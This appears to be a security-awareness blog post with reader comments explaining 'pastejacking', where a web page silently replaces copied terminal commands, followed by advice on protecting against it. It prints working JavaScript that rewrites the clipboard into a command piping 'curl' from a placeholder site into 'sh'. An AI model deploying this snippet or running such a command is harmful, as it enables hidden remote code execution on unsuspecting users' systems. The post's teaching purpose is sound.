An unusual hacking demonstration will make you think twice before copying or pasting any text.
This is why you should NEVER copy pasting commands directly to your terminal. Ask any developer or administrator if they have ever copied a command line or code snippet from the web. The answer would probably be YES. You'll assume what you copied is what you paste, right? Well, no!
You think you are copying one thing, but it is being replaced by something else, such as malicious code. All you need is a single line of code inserted into the code you copied to create a backdoor in your application.
This attack is very simple but can cause great damage. Let's see how it works in practice:
Thanks to Harel Friedlander for recording this video.
Suppose you are looking for how to update your ubuntu and found the following command, Copy it. Try it - copy and paste the following command:
$ sudo apt update
Here is the JavaScript running exploit.
document.getElementById('copyme').addEventListener('copy', function(e) {
e.clipboardData.setData('text/plain',
'echo "τo sudo apt update έγινε [curl http://kakovoulo-site.com | sh]"\n'
);
e.preventDefault();
});
How can I protect myself?
The safest way is to paste nothing from the web into your terminal. Another option is to add "#" before pasting, this will turn the command into a "comment" and will not execute it. This way you will see what you will paste before your terminal runs. You can of course paste the command into a txt file before putting it in your terminal.
Also many terminals can be configured not to run automatically when you paste a "\ n" (new line)
The above was just one example of why awareness raising is necessary to avoid any intrusion. There are many examples of really malicious scripts circulating on the internet.
The other alternative, of course, is to use an intermediate destination (eg text editor), where it will show what you really have in your clipboard.
A humble thank you!
Good evening, Happy Birthday and Happy New Year !!
I would like to thank you first for your informative articles.
Another solution that solves the above problem works in firefox, about: config >> dom.event.clipboardevents.enabled >> false.
A friend of the most customizable browser in the world.
happy new year, thank you for adding